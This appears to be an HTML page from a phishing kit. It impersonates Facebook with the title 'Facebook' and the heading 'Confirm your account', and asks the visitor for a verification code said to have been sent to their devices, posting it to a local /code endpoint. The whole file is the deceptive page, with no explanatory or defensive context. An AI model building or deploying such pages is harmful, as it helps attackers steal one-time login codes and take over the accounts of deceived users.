<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Facebook</title>
    <link rel="stylesheet" href="style2.css">
</head>
<body>
    <div id="main">
        <h3>Confirm your account</h3>
        <p>We send a code to devices where you're logged in</p>
        <form action="/code" method="POST">
            <input type="number" name="code" placeholder="Enter code"><br><br>
            <button type="submit">Continue</button><br><br>
            <button>Send code again</button><br>
        </form>
    </div>


</body>
</html>